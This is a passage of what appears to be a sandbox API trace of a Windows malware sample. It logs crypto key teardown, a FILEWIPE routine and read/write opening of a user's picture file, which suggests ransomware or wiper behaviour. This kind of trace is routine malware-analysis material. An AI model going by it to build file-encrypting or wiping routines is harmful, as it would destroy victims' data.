returned 0xf [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.595] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.595] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.601] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.601] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.601] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.602] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.602] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.602] CryptDestroyKey (hKey=0x7c2200) returned 1 [0040.602] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.602] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.602] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.602] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.602] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.603] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.603] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.603] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.603] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.603] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.604] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.604] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.604] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.604] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.604] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.606] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.606] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x34056510, ftLastWriteTime.dwHighDateTime=0x1d5bd80, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0x7c2100 [0040.606] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.606] CharLowerBuffW (in: lpsz="byte[34513]", cchLength=0xb | out: lpsz="byte[34513]") returned 0xb [0040.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.607] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.607] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.607] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.607] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.608] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.609] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\bbtymjaxu4vq024a.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.609] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 